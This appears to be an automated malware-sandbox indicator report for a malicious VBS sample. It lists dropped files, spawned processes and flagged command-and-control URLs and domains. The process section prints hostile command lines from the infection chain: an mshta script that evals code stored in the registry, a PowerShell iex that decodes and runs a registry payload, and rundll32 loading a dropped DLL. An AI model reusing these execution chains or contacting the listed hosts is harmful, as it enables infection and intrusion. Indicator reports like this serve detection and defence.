IOCReport

loading gif

Files

File Path
Type
Category
Malicious
sample.vbs
ASCII text, with very long lines, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.0.cs
UTF-8 Unicode (with BOM) text
dropped
malicious
C:\Users\user\AppData\Local\Temp\fum.cpp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline
UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
clean
C:\Users\user\AppData\Local\Temp\RESB252.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Temp\RESC397.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlng44lx.iid.psm1
very short file (no magic)
dropped
clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nre1bpnm.vkr.ps1
very short file (no magic)
dropped
clean
C:\Users\user\AppData\Local\Temp\adobe.url
MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
dropped
clean
C:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP
MSVC .res
dropped
clean
C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline
UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
dropped
clean
C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
clean
C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.out
ASCII text, with CRLF, CR line terminators
modified
clean
C:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP
MSVC .res
dropped
clean
C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.0.cs
UTF-8 Unicode (with BOM) text
dropped
clean
C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
clean
C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.out
ASCII text, with CRLF, CR line terminators
modified
clean
C:\Users\user\Documents\20210910\PowerShell_transcript.581804.5QGhQCWh.20210910111356.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
clean
There are 9 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\sample.vbs'
malicious
C:\Windows\System32\rundll32.exe
rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
malicious
C:\Windows\System32\mshta.exe
'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'
malicious
C:\Windows\System32\control.exe
C:\Windows\system32\control.exe -h
malicious
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
clean
C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
clean
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
clean
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
clean
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB252.tmp' 'c:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP'
clean
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC397.tmp' 'c:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP'
clean
There are 4 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://art.microsoftsofymicrosoftsoft.at/M0s2qYX0svCgNwwi/PPI7Xc5SLSkLQIY/5lrOW2oNgPCEjObB3W/rK9MpeZNZ/UBjNTHqn019AlZCIEx5P/tkwag9cTBuiHiomNMOd/c4Fs5ApV0T_2BnjVwW3gyf/bJPiicUJ8f_2F/p_2BzDHN/AttyzxcYoU5_2FqrCObbGoi/jSm_2BVGxu/KGJY3tUfrdwytDYZ_/2BjCzYCnXysU/C2JbU3dlXVl/5uJ7MQlXxw8eLV/q0zaTcL3CTeSA980379DA/dHPHAS9NwOC9V6VK/lP_2FDVrlGe4ayd/LAmEzNRn3GukTSqHPk/HGsc32BVj/4Gvn4Q9G8MH6Q5yTHXJc/ulutZq7s
185.251.90.253
malicious
http://art.microsoftsofymicrosoftsoft.at/08OHsz1N1FvuG6kjmE/aTh0zMsnZ/SI0oUmCO_2BS5MoLEECj/uZ7K5bJdnYQx3WN05uH/v_2Fm83_2BmFHvZHPW65zA/GW0_2BJDiUD1w/ZK6b_2Bh/StY6HpePFkaOsmwn5z64jk4/hNqOPWlFAk/QdUHTQ0be2zDX_2Bp/gFERm0UEw08y/zSKvozh3BGq/IuojbbR5mE_2FM/dq0z5j8vfE1Mb6ztPRP2X/B41DadMfELfCe7ey/X881VUbPPRiD756/vcgjm_2B6diCc8QiJ8/zWiCv09og/LPjcs0IySRyGzo4FtAjY/MaQN7Yj0rwdcUGBU3Lw/cxZIrRpMI9kt/XnFePhCWR/v
185.251.90.253
malicious
http://art.microsoftsofymicrosoftsoft.at/W7oPFKe8v92MJK/3s9n12Zlxxip0RpYqadjX/SO7W1_2FF9Pkd4OV/Fr1cAJR5yzwxrV5/Jx7W_2FGpEVbkHb92i/nk7onhk3e/t3LARu0x8PsikCuNcG3A/xVZtlmy23EEwScpeJDo/wvuFYBZUTBSU84oV7Elz6G/vj_2F1HMVCKsF/ltj9usP8/bN_2Bx9_2BXwYInwNajYI72/h9Hrv5vhx_/2F82si9cIkqX7v6R4/9UOOaco5x39h/66X8TzwdR07/vkpw_2FwebnNKA/xttU1J1hU1aqHEwJ_2BPb/e_2FLASBRA3M51hv/aDQxYMFh2bS_2BM53oI/t
185.251.90.253
malicious
http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNW
unknown
malicious
http://atl.bigbigpoppa.com/
unknown
malicious
http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44eu
unknown
malicious
http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWGS38iu6HBSu0eZQC/bmSTwgO68w/mDzLSD0yv5NsCWUYa/KrMPefIXTo7Y/kYocGyKbfHI/qpROOMC7W3BpuS/FiHxn9Vj_2BE_2BRO1MPS/HSvVFR_2FvFubdta/FMJR0bw3OFOckhz/gihVzVqSiIHGsYLcl_/2FiUzDnO5/Znp2qHqDPmJt_2FKhKU2/B1dWx_2FKsmf5DpcS8Z/eu7lOAGu9ogHBSfDIGfPdL/lCnFrX6yLs9rJ/djJKkMKB/PGYeMNf7nd3nwYWaABiF0QM/d
185.251.90.253
malicious
http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44euzNQd9TRf/1Zb3P4q5F0mc0qdltC/bLlV5uCsx/obqe2ve9g7Th5DnAa17u/ifRiDnyBBWyxfspwjbc/4e64zsAjWvHHh07WM2IgYy/t1JnmxqkM0edm/B_2Fp0Xl/aO6EV9JJQOgg5QsFoCbzQfO/_2BOZLcUIR/ooMrpCxMndVWwPntp/mvRIBZb_2B_2/Beg4_2F_2Fr/I_2FcfrvgLZ_2F/J3NCkzqZf5_2Fr1C_2BZp/h9SFOIo1qkmT8Tal/3qdDBO5XKEdw_2F/4xqo8eXRx/pJscFz7Rq/r
185.251.90.253
malicious
http://atl.bigbigpoppa.com/yycLCxNRZEFU2J4UrQOl/FX7uF3nnSEu1rXBTN4d/LylqoAvPuubQ7SHiRZfBKF/4dapCnHjf6OGO/yl6rivKE/fgvQJKMe8TaTP5ycHGNAJUS/0YTRa2nWMo/en2LMiL2tQIZKUpol/smZ_2B4BmeyI/57ObWaf9NZW/uHAXXMRRQnyL7K/pZ21NZyhAYoU6jMX_2FXx/_2F1viwpW6B_2BQx/yytF1Qgt5sD6QuY/yCiBnG89B2zLl6ouYK/ovFfokaNC/WnbbXZP7gD7mtpGqOSST/2_2Fq_2BjMeuOfq6Yo5/TugSOTNVmBx8AK0VzEQO9D/fxXdG0idPk4t/207vRTOEh/oW
185.251.90.253
malicious
http://nuget.org/NuGet.exe
unknown
clean
http://constitution.org/usdeclar.txt
unknown
clean
http://pesterbdd.com/images/Pester.png
unknown
clean
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
clean
https://contoso.com/
unknown
clean
https://nuget.org/nuget.exe
unknown
clean
http://constitution.org/usdeclar.txtC:
unknown
clean
https://contoso.com/License
unknown
clean
https://contoso.com/Icon
unknown
clean
http://https://file://USER.ID%lu.exe/upd
unknown
clean
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
clean
https://github.com/Pester/Pester
unknown
clean
There are 11 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
art.microsoftsofymicrosoftsoft.at
185.251.90.253